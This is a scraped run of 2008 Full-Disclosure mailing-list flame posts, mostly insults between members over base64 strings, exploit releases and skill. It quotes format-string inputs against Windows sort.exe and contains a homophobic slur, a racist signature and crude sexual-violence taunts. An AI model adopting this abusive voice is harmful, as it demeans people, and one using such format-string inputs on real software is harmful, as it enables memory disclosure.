you said it was 'fun' implying that you felt happy after you had accomplished the task ( decoding the string in this case ). so unless you naturally have fun decoding simple strings, then this must of been a new experience for you/challenging one to solve On Jan 21, 2008 9:28 PM, Maxim [EMAIL PROTECTED] wrote: where did I use the word challenging? On Mon, 2008-01-21 at 21:25 -0600, reepex wrote: ... if base64 was challenging for you then maybe you should switch fields of work On Jan 21, 2008 9:04 PM, Maxim [EMAIL PROTECTED] wrote: that was fun ... :-) stuff like that should be on people's job interviews. On Mon, 2008-01-21 at 21:59 -0500, [EMAIL PROTECTED] wrote: Remember that although 99.98% of the Internet population ends up using it, 99.97% are totally unaware of the fact because they have point-n-drool GUI interfaces to hide the gory details from them. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )
On Jan 21, 2008 8:39 PM, Harry Hoffman [EMAIL PROTECTED] wrote: Is this anything more then a base64 encoded password hash? base64 encoded password hash - lol - what security for dumbies book did you get this phrase from? also after identifying it as base64 could you really not decode it to get the plaintext value? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )
c2h1dCB1cCBoaXBwaWU= On Jan 21, 2008 9:50 PM, Pat [EMAIL PROTECTED] wrote: SSBkb25cJ3QgdW5kZXJzdGFuZCB3aGF0IHRoZSBiaWcgaXNzdWUgaXMuIFNvIHdoYXQgaWYgcGVvcGxlIGRvblwndCB1bmRlcnN0YW5kLi4uPw0KU29tZSBwZW9wbGUsIGFuZCB0aG9zZSB0aGF0IHRoaXMgaXMgb2J2aW91c2x5IHJlbGV2YW50IHRvLCB3aWxsIGxvb2sgYXQgdGhlIGFib3ZlIHN0cmluZywgb3IgZXZlbiB0aGlzIG9uZSwgYW5kIGtub3cgd2hhdCBpdCBpcyB0aGF0IHdlIGFyZSBkaXNjdXNzaW5nLCBhbmQgaG93IHRvIGRlY29kZSBpdC4gVGhvc2UgZm9yIHdob20gdGhpcyBpcyBub3QgcmVsZXZhbnQgd2lsbCBub3QgYmUgYWJsZSB0byB1bmRlcnN0YW5kLCBhbmQgbm9yIHNob3VsZCB0aGV5IGhhdmUgdG8uDQpJIHNlZSBubyBwb2ludCBpbiBwYXlpbmcgb3V0IG9uIHBlb3BsZSBmb3IgdGhlIGFiaWxpdGllcyB0aGF0IHRoZXkgZG8gbm90IHBvc3Nlc3MuIEVhY2ggYW5kIGV2ZXJ5IG9uZSBvZiB1cyBoYXMgaGFkIHRvIGxlYXJuIHRoZXNlIHRoaW5ncyBhdCBzb21lIHBvaW50LCBhbmQgc28gYXQgc29tZSBwb2ludCBpbiB0aW1lLCB5b3UgdG9vLCB3ZXJlIGtlcHQgXCJvdXQgb2YgdGhlIGxvb3BcIiB3aGlsZSBwZW9wbGUgdGhhdCB0aG91Z2h0IHRoZXkgd2VyZSBiZXR0ZXIgdGhhbiB5b3UgZGlzY3Vzc2VkIHRoaW5ncyBpbiBsYW5ndWFnZXMgdGhhdCB5b3UgZGlkblwndCB1bmRlcnN0YW5kLg0KDQpTb3J0YSBsaWtlIHJlLXdyaXRpbmcgYWxsIHRoaXMgaW4gR2VybWFuIC4uLg== On 22/01/2008, reepex [EMAIL PROTECTED] wrote: On Jan 21, 2008 8:39 PM, Harry Hoffman [EMAIL PROTECTED] wrote: Is this anything more then a base64 encoded password hash? base64 encoded password hash - lol - what security for dumbies book did you get this phrase from? also after identifying it as base64 could you really not decode it to get the plaintext value? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )
On Jan 21, 2008 10:50 PM, Nick FitzGerald [EMAIL PROTECTED] wrote: Think pre-MIME/Base64 and U should be able to suss it out... nice aol speak noob ;) it shar would be a pity if people didnt get this ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] congenital idiots(dont u know who nick fitzgerald is?(now I KNOW why I never post in my real name)) Re: [Professional IT Security Providers - Exposed] PlanNetGroup ( F )
a ... you are first of probably many to miss the intention of why i called out that line and that particular 'U' one day it will come to you :) On Jan 21, 2008 11:10 PM, bugtraq user [EMAIL PROTECTED] wrote: Anklebiters getting rather deep arent they Nick? a bugtraq follower(camp follower) reepex wrote: On Jan 21, 2008 10:50 PM, Nick FitzGerald [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Think pre-MIME/Base64 and U should be able to suss it out... nice aol speak noob ;) it shar would be a pity if people didnt get this ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ congent ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [FDSA] Sort - Critical Format String Vulnerability
LOL you are an idiot could you please google format string 101, read the printf man page, and leave security forever On Jan 18, 2008 1:45 AM, Tonnerre Lombard [EMAIL PROTECTED] wrote: Salut, Fredrick, On Thu, 17 Jan 2008 12:05:13 -0600 Fredrick Diggle [EMAIL PROTECTED] wrote: The following output shows a manafestation of this vulnerability: C:\sort %x.%x.%x.%x 7c812f39.0.0.41414141The system cannot find the file specified. This is actually confirmed on Windows 2000 and XP. This vulnerability can be trivially exploited to execute arbitrary code on the computer machine. There I don't agree however, it is a simple memory reading vulnerability. The following command line will use sort.exe to execute the windows calculator. C:\sort CALC.EXE%x%x%x%n | calc That's not very surprising since you pipe into the calculator so it is spawned by the shell. Severity: Quite High There I don't agree. In theory, there should not be anything important in the memory of the sort process which is not already known to the user executing it anyway. It is clearly a bug though, and wants to be fixed. So congratulations to a working, though overdramatizised, discovered format string vulnerability. Tonnerre -- SyGroup GmbH Tonnerre Lombard Solutions Systematiques Tel:+41 61 333 80 33Güterstrasse 86 Fax:+41 61 383 14 674053 Basel Web:www.sygroup.ch [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] what is this?
and what exactly does gadi evron know and what .. original research ... has he ever done? and your second paragraph makes no sense, and is not related to the topic - you sound like paul at utdallas On 1/16/08, scott [EMAIL PROTECTED] wrote: Not to mention that Gadi Evron knows more than all of these wanna-be's put together! I guess the new world order of cyberpunks is just really intolerant of ideas that are outside the realm of neat tools and other people writing their exploits for them,so that the sheer act of learning something new turns them off. :-( Lord Help InfoSec, Scott Tremaine Lea wrote: Probably because Gadi is at least close to on topic whether the majority of readers appreciate the posts or not. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gadi Bashing, enough already....
so gadi can use ethereal and uninstall malware? congrats? On 1/17/08, Richard Golodner [EMAIL PROTECTED] wrote: I have been friends with Gadi through email for many years now and he needs to have someone represent for him. He is a good guy, signs his own email instead of the hushmail or Gmail mask. On top of all that he is also a knowledgeable and friendly guy. He does a great job exploring and reporting the areas of interest to him and has helped many people remove bot-net problems from their own nets. Give the guy a break, he is a good dude. P.S. Punks do not know what federal agencies read these dumb ass lists but should be aware that email threats can be taken very far in courts these days. Ask old Kevin! Richard Golodner [EMAIL PROTECTED] PGP 0x50F20D0C ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] what is this?
On Jan 14, 2008 3:46 PM, Gadi Evron [EMAIL PROTECTED] wrote: I did not look at the malware, but it is pretty obvious you have been compromised. Because you do not have the skill necesary to do so. Linking also to my original article here: http://blogs.securiteam.com/index.php/archives/815 blah blah i have nothing useful to say but I am going to spam my blog that no one reads. Why do we let gadi spam but bitch about the guy spamming to defend his business? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] what is this?
woah paul are you talking about stuff you do not know about again? [1] You like to butt in on conversations. and how do you that this virus has been put in virustotal, maybe it is new? Most people with decent RE skill ( unlike you and gadi ), would take the virus apart themsevles to see what it is doing [1] http://archives.neohapsis.com/archives/fulldisclosure/2007-11/0018.html Here paul calls out comp sci majors and when I took his bet he backed down saying it was a joke. Seems paul likes to run his mouth about nothing. On Jan 16, 2008 8:26 PM, Paul Schmehl [EMAIL PROTECTED] wrote: --On January 16, 2008 8:19:52 PM -0600 reepex [EMAIL PROTECTED] wrote: On Jan 14, 2008 3:46 PM, Gadi Evron [EMAIL PROTECTED] wrote: I did not look at the malware, but it is pretty obvious you have been compromised. Because you do not have the skill necesary to do so. Yeah, right. It takes real l33t ski11z to submit a file to Virustotal and find out what it is. And uber l33t ski11z to figure out that the javascript on his website is downloading the infection to site visitors. Paul Schmehl ([EMAIL PROTECTED]) Senior Information Security Analyst The University of Texas at Dallas http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hacking The Interwebs
On 1/13/08, pdp (architect) [EMAIL PROTECTED] wrote: The most malicious of all malicious things to do when a device is compromised via the attack described in the link pointed at the top of this email, is to change the primary DNS server. That will effectively turn the router and the network it controls into a zombie which the attacker can take advantage of whenever they feel like it. lol fear/fud/attempt for media hype? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SunOS 5.10 ICMP Remote Kernel Crash Exploit Code
this was a very rude off list reply to my question and notice - you still have not answered why you released this code a year later could you please answer this? On Jan 10, 2008 6:13 PM, eliteb0y [EMAIL PROTECTED] wrote: Shut the fuck up. -- *From:* reepex [mailto:[EMAIL PROTECTED] *Sent:* Friday, January 11, 2008 1:03 AM *To:* eliteb0y; full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] SunOS 5.10 ICMP Remote Kernel Crash Exploit Code http://seclists.org/fulldisclosure/2007/Dec/0394.html arent you this idiot? I am pretty sure you are one of the bigger jokes on this list. also you did not answer my question: why did you release such simple code a year later? On Jan 10, 2008 4:01 PM, eliteb0y [EMAIL PROTECTED] wrote: Thank you for being everyones personal idiot. -- *From:* reepex [mailto:[EMAIL PROTECTED] *Sent:* Thursday, January 10, 2008 9:28 PM *To:* kcope; full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] SunOS 5.10 ICMP Remote Kernel Crash Exploit Code did it take you the whole year since the bug was published to write this code? Why release something so simple for such an old bug? Does this excuse your retarded songs you throw at us? On Jan 10, 2008 11:16 AM, kcope [EMAIL PROTECTED] wrote: (see attached) - -kcope -- GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS. Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SunOS 5.10 ICMP Remote Kernel Crash Exploit Code
you still have not gave a reason as to why you published this code On Jan 10, 2008 11:44 PM, eliteb0y [EMAIL PROTECTED] wrote: Bla bla bla, no it was bla -Original Message- From: Joey Mengele [mailto:[EMAIL PROTECTED] Sent: Friday, January 11, 2008 5:44 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] SunOS 5.10 ICMP Remote Kernel Crash Exploit Code The Benign Euphoria, It discourages them from posting faggot shit to the list in the future. Thanks. J One in every three black males is in some phase of the correctional system. Is that a coincidence or do these people have, you know, like a racial commitment to crime? - Valdis Kletnieks On Thu, 10 Jan 2008 20:20:22 -0500 b9u4ea [EMAIL PROTECTED] wrote: Regardless of their contribution, what is the benefit of belittling anyone on (or off) the list? On Jan 10, 2008 6:17 PM, reepex [EMAIL PROTECTED] wrote: this was a very rude off list reply to my question and notice - you still have not answered why you released this code a year later could you please answer this? On Jan 10, 2008 6:13 PM, eliteb0y [EMAIL PROTECTED] wrote: Shut the fuck up. From: reepex [mailto:[EMAIL PROTECTED] Sent: Friday, January 11, 2008 1:03 AM To: eliteb0y; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] SunOS 5.10 ICMP Remote Kernel Crash Exploit Code Subject: Re: [Full-disclosure] SunOS 5.10 ICMP Remote Kernel Crash Exploit Code http://seclists.org/fulldisclosure/2007/Dec/0394.html arent you this idiot? I am pretty sure you are one of the bigger jokes on this list. also you did not answer my question: why did you release such simple code a year later? On Jan 10, 2008 4:01 PM, eliteb0y [EMAIL PROTECTED] wrote: Thank you for being everyones personal idiot. From: reepex [mailto: [EMAIL PROTECTED] Sent: Thursday, January 10, 2008 9:28 PM To: kcope; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] SunOS 5.10 ICMP Remote Kernel Crash Exploit Code did it take you the whole year since the bug was published to write this code? Why release something so simple for such an old bug? Does this excuse your retarded songs you throw at us? On Jan 10, 2008 11:16 AM, kcope [EMAIL PROTECTED] wrote: (see attached) - -kcope -- GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS. Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html -- Click now for great deals on quality business cards! http://tagline.hushmail.com/fc/Ioyw6h4dApHTlspCqTKL3r8JkSfo6PBurGrbdMJ8mlheU 8q6Rnocup/ Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PWDumpX v1.4
he is a 'point and click' hacker .. do not confuse him On Jan 8, 2008 3:00 AM, Tonnerre Lombard [EMAIL PROTECTED] wrote: Salut, On Tue, 8 Jan 2008 04:21:33 +0200 Markus Jansson [EMAIL PROTECTED] wrote: How about a nice GUI? Or atleast some kind of GUI? I dont know what OS are you using, but I stopped using MS-DOS about 15 years ago. Im sure there are folks out there who just lve command line crap, mostly Linux users I suppose, they obiously are still missing what even Windows 3.11 had. But most of us who live in this day are used on using OS and programs that work via GUI. Ever tried to use a GUI over telnet? What are you going to do in a remote pentest? Try to install a VNC server on the server in order to be able to start the GUI? Tonnerre -- SyGroup GmbH Tonnerre Lombard Solutions Systematiques Tel:+41 61 333 80 33Güterstrasse 86 Fax:+41 61 383 14 674053 Basel Web:www.sygroup.ch [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]
well I will miss all your fan mail from the past. maybe i will forward them to the list one day for other's entertainment On Jan 2, 2008 9:55 PM, scott [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 An your earth-shattering views are *SO* important,you must make sure everyone hears you.I think you just like to see your own posts. I'm filtering your posts from now on as they are nothing but from a wanna-be trying to play kids games in a mans world. I shouldn't waste my time responding to a teeny- bopper,anyway. Scott reepex wrote: So you included me in here because my name has something to do with farm equipment? Did your message have a point? You wrote a bunch of nonsense flattering your favorite security stars and then attempted to flame us with one liners that did not make sense.. It seems you are caught in between the serious posters ( since you have no skill, you cannot post anything useful), and the trolls ( because you are not funny or convincing ). My version of full disclosure is calling out idiots with Cissps and Phds who post here and think their XSS and earth shattering barragess of 0x41's makes them security experts. On Jan 2, 2008 10:46 AM, [EMAIL PROTECTED] wrote: Critical Vulnerability in [Full-Disclosure] The problem with full disclosure is that everyone feels the need to fully disclose, even when their opinion and the information they are purporting to impart is, well, bollocks. You can't tell them to shut up as they think they're important and the internet gives them balls of steel and verbal diarhoea, so we stumble from one tired flamewar to another with no useful content being published. It's embarrassing. I'm an advocate of FD as a concept. I believe that there is no such thing as an innocent on the internet and if you really are that dumb, then you deserve everything you get. FD (as one of many like- minded lists) forces the vendors to patch or die and eventually write quality code. FD (the concept, not the list) is the ultimate nuclear deterrent, without the mutually assured destruction lunacy. I have watched the posters to this list for some time. By far the vast majority are transparently kiddies, sitting on their painted- up laptops thinking of themselves as the techno-brats in the film Hackers and hoping to grow up to be like the guy in the film Swordfish. They write in l33t5p34k and think that this somehow makes them informed. Kiddies are the lowest form of life in the hierarchy of information security and in the IT industry generally. You know who you are and so does everyone else. You are fools, and an embarrassment to the craft: Secreview (review of products/services you have never bought, are you the goatse.cz receiver?) Reepex (Isn't a reepex a bit of farm machinery?) Gobbles (A nickname for a gay male prostitute) Morning Wood (The holy grail of the viagra-abuser) Gmaggro (high value target selection, are you completely cocking stupid?) Oh, the outrage. I can see it now. there will be armies of skiddies demanding that the l33tz hack this [EMAIL PROTECTED], spam him, pwn him, and post defamatory messages concerning her skills and possible employment opportunities for her and her mother everywhere possible. Guess what, kids? I don't care. No, not even a little bit. Do what you like, I could care less and no one else cares if you live or die tonight, you sad, acne'd little dewdrops. Calmed down yet? Good. I want you to consider something. The FD list consists of the following content (and what it has to say): Advisories by vendors (we fixed this) Advisories by individuals (I tested that and found this) Advisories by infosec organisations (we found this) Funnies (self explanatory) Opinions (this sucks, what about that?) Skids (I did this, aren't I great, everyone else sucks?) Trolls (you suck) Trawlers (I have something 0day to buy or sell) The top three (ie the useful content) is available in any one of a hundred places, the bottom three are noise. The only people interested in the noise are those who keep track of it for a living. So, consider that by posting anything in the bottom three categories, you are drawing the attention of those who take an interest in your sad efforts to destabilise the technical crutch of society. These people are better than you in every important way, and if you so much as tiptoe across one of their lines, you'll wind up sharing a cell with a 7ft gorilla called george with a dead mouse and a pressing need to dry-cornhole your ringpiece 3 times a night and twice on sundays. Do yourselves a favour and STFU. What's left? The funnies and the opinions. I've laughed my tits off at posts by Mssrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and i've been interested by a few others who will remain nameless
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
everyone who is not a kiddie knows rsnake is a joke, just like anyone else involved in his *.ackers group. If rsnake was to post to places like this instead of lamer 'hacker'/'security' magazines then he would be ridiculed off the list like pdp architect was. Instead I believe rsnake knows hes a kiddie so he sticks to places with non-technical people and does not involve himself with people who actually know what they are talking about. I picked on Adam Munter mostly because his lame intern decided to spout up on the list only to end up being a kiddie, and also Adam brought it upon himself by putting any worth into what secreview says and replying to their review. On Jan 2, 2008 12:02 AM, Andre Gironda [EMAIL PROTECTED] wrote: On Jan 1, 2008 9:51 PM, reepex [EMAIL PROTECTED] wrote: ok so they are nothing alike because ptp/hts actually teach you stuff while UPT was for jokes... so your post was stupid The joke's on you since you don't have the context. I am not a part of secreview but I realize following email threads is very complicated for you. It's not complicated. I simply just don't care about who you are as it relates to the thread. You appear to be attacking the person/people I'm defending, while at the same time defending the secreview post. So you list 5 tools they use then mention they modify a javascript library... So basically they use automated tools and are former web developers ... sound pretty hardcore Javascript is more than just a language for web developers, especially when utilized in the Hailstorm SmartAttack library, which isn't a Javascript library. These are completely different concepts. It should also be noted that both Burp Suite and Hailstorm ARC can be used in manual and hybrid modes... with step-modes and form-trainers. They can modify their traversals and have tons of extra customization on top of what other offerings provide... and can customize the underlying data-driven attacks. Certainly you've read some of Adam Muntner's comments on, say, ha.ckers.org and other places? Allow me to pick on someone in the industry for a second: RSnake. RSnake has an advertisement up on his website that asks, Which web application scanner can hack it? Check the Oct 15 post for study results: http://ha.ckers.org/blog/20071014/web-application-scanning-depth-statistics/ Most idiots will only read what RSnake / Larry Suto have written, and will completely miss the comments by Adam Muntner. Adam not only eloquently puts down the testing techniques by Larry Suto, but also makes mention about proper customization of tools and testing outside of the commercial scanners. Effectively, Adam Muntner is one of the only people that does understand this problem that you specifically says that he does not, and that the secreview challenge seems to care about most of all other points. Where was reepex, where was secreview when RSnake and Larry Suto blundered our industry into submission? Why pick on a hero like Adam Muntner instead? What are you getting out of it? Worse - RSnake hasn't been called out on this yet - but he has good reason to promote Larry's paper. In fact, it may even be a monetary reason. In an article for INSECURE Magazine, they interview RSnake (page 30): http://www.net-security.org/dl/insecure/INSECURE-Mag-14.pdf Question; What web application scanners do you use? RSnake: [...] my favorite tools in my arsenal (including the manual ones) are: Burp Suite, THC Hydra, fierce, Nessus, Nikto, nmap, NTOSpider (commerical), httprint, Cain, sn00per, Absynthe, Sqlninja, a half dozen Firefox plugins like Webdeveloper, JSView, NoScript, Greasemonkey etc... and the entire suite of unix utils out there, like wget, telnet, ncftp, etc. Notice the only commercial tool listed in NTOSpider. Coincidence? Apparently, too much admiration of a single web application security scanning vendor can be a bad thing. Larry Suto has only ever worked with Eric Caso at NTObjectives. Adam Muntner has been a customer of several CWE-Compatible and aspiring companies out there. He has a balanced view of both the commercial tools and the open-source world, as well as building his own tools from scratch as the need may be. You must be a cissp because you take yourself and the internet very seriously. I am pretty sure no one cares about your opinion either. Wrong again; as always. Cheers, Andre ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
if you noticed he was reading tanebaum's book about minix. If you would look at the book you would see he relies heavily on source code and actually has the code in the back of the book so that he can refer to it constantly. In other books i agree you do not have to know C, but for this book, if you do not know C, you will end up understanding at a very very high level what message passing is and thats about it. On Jan 2, 2008 12:39 PM, [EMAIL PROTECTED] wrote: On Tue, 01 Jan 2008 12:33:36 CST, reepex said: Is this list up to date? It makes it seem as if you are learning basic linux commands, sed, and basic perl. Also why are you reading operating system design and implementation when you do not know C? C is not a prerequisite for understanding operating systems design. It's only needed if the particular operating system you're working with implements its internals in C. What is more important is understanding the *concepts* - things like locking, and race conditions, and how fine-grained locking you need/want for a filesystem. Having one big lock is a lot easier, but causes contention - having a lot of little locks can cause deadlocks, especially in error handlers. What does the filesystem code do if (for example) it gets 2/3 of the way through the rename of a file, and encounters an I/O error while writing out the removal of the old name of the file? What are the trade-offs required for an operating system to support jitter-free multimedia applications (the first thing to learn is that throughput, latency, and jitter are intertwined, and it's very difficult to do all 3 well at the same time)? It's also important to understand that there are approaches other than Windows and Unix/Linux - IBM's VM and MVS systems have been around for a long time, and have a lot to tell us about other choices that can be made. There's still a lot of VMS running out there in scattered corners as well - and that system had a lot of concepts that one should understand, at least well enough to know why my favorite system didn't do it that way because... (Hint - consider how and why SYS$FOO variables worked in VMS, and why they're so hard to get working correctly under Linux - they're *not* exactly the same as Unix/Linux environment variables, and as such provide both problems and solutions that environment variables don't). Bonus points for knowing that VMS was mostly written in Bliss/32 or some such, and VM and MVS were a mixture of assembler and (later on) PL/S. No C knowledge needed for those critters... Even when the system *is* written in C, you don't need to be a C guru to understand what's going on. Maurice Bach's The Design of the Unix Operating System is probably one of the classic texts - but you don't need to know C any better than read C code snippet as pseudocode to follow it. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Was secreview crap - now OpenVMS!!
its funny how you always talk about other people ( like a few days ago when you were amazed that people exploited an off by one ), and talk about the old times... sure signs of someone washed up as evident by your non-productiveness in the last few years ( and no - spamming mailing lists does not count ) On Jan 2, 2008 1:32 PM, [EMAIL PROTECTED] wrote: On Wed, 02 Jan 2008 14:13:48 EST, Randal T. Rioux said: OpenVMS is less than 40% Blissful... Obviously, it's migrated over the years. Back in the late 80's when it was at its most prevalent (and before it got 'Open' attached to it - we're talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily Bliss32.. Security relevance: UNHACKABLE! grin WANK! (The old-timers will know what that means, and it's not what you newbies think... ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]
So you included me in here because my name has something to do with farm equipment? Did your message have a point? You wrote a bunch of nonsense flattering your favorite security stars and then attempted to flame us with one liners that did not make sense.. It seems you are caught in between the serious posters ( since you have no skill, you cannot post anything useful), and the trolls ( because you are not funny or convincing ). My version of full disclosure is calling out idiots with Cissps and Phds who post here and think their XSS and earth shattering barragess of 0x41's makes them security experts. On Jan 2, 2008 10:46 AM, [EMAIL PROTECTED] wrote: Critical Vulnerability in [Full-Disclosure] The problem with full disclosure is that everyone feels the need to fully disclose, even when their opinion and the information they are purporting to impart is, well, bollocks. You can't tell them to shut up as they think they're important and the internet gives them balls of steel and verbal diarhoea, so we stumble from one tired flamewar to another with no useful content being published. It's embarrassing. I'm an advocate of FD as a concept. I believe that there is no such thing as an innocent on the internet and if you really are that dumb, then you deserve everything you get. FD (as one of many like- minded lists) forces the vendors to patch or die and eventually write quality code. FD (the concept, not the list) is the ultimate nuclear deterrent, without the mutually assured destruction lunacy. I have watched the posters to this list for some time. By far the vast majority are transparently kiddies, sitting on their painted- up laptops thinking of themselves as the techno-brats in the film Hackers and hoping to grow up to be like the guy in the film Swordfish. They write in l33t5p34k and think that this somehow makes them informed. Kiddies are the lowest form of life in the hierarchy of information security and in the IT industry generally. You know who you are and so does everyone else. You are fools, and an embarrassment to the craft: Secreview (review of products/services you have never bought, are you the goatse.cz receiver?) Reepex (Isn't a reepex a bit of farm machinery?) Gobbles (A nickname for a gay male prostitute) Morning Wood (The holy grail of the viagra-abuser) Gmaggro (high value target selection, are you completely cocking stupid?) Oh, the outrage. I can see it now. there will be armies of skiddies demanding that the l33tz hack this [EMAIL PROTECTED], spam him, pwn him, and post defamatory messages concerning her skills and possible employment opportunities for her and her mother everywhere possible. Guess what, kids? I don't care. No, not even a little bit. Do what you like, I could care less and no one else cares if you live or die tonight, you sad, acne'd little dewdrops. Calmed down yet? Good. I want you to consider something. The FD list consists of the following content (and what it has to say): Advisories by vendors (we fixed this) Advisories by individuals (I tested that and found this) Advisories by infosec organisations (we found this) Funnies (self explanatory) Opinions (this sucks, what about that?) Skids (I did this, aren't I great, everyone else sucks?) Trolls (you suck) Trawlers (I have something 0day to buy or sell) The top three (ie the useful content) is available in any one of a hundred places, the bottom three are noise. The only people interested in the noise are those who keep track of it for a living. So, consider that by posting anything in the bottom three categories, you are drawing the attention of those who take an interest in your sad efforts to destabilise the technical crutch of society. These people are better than you in every important way, and if you so much as tiptoe across one of their lines, you'll wind up sharing a cell with a 7ft gorilla called george with a dead mouse and a pressing need to dry-cornhole your ringpiece 3 times a night and twice on sundays. Do yourselves a favour and STFU. What's left? The funnies and the opinions. I've laughed my tits off at posts by Mssrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and i've been interested by a few others who will remain nameless as I can't list them all. Long live full disclosure, but keep in mind that you're only legends in your own bedrooms. later, pi -- Click to get a free auto insurance quotes from top companies. http://tagline.hushmail.com/fc/Ioyw6h4d8EIl5uJlSoB5C7HKVmuBsQOXlKB8YUus2MT2FpMkQCNmCM/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
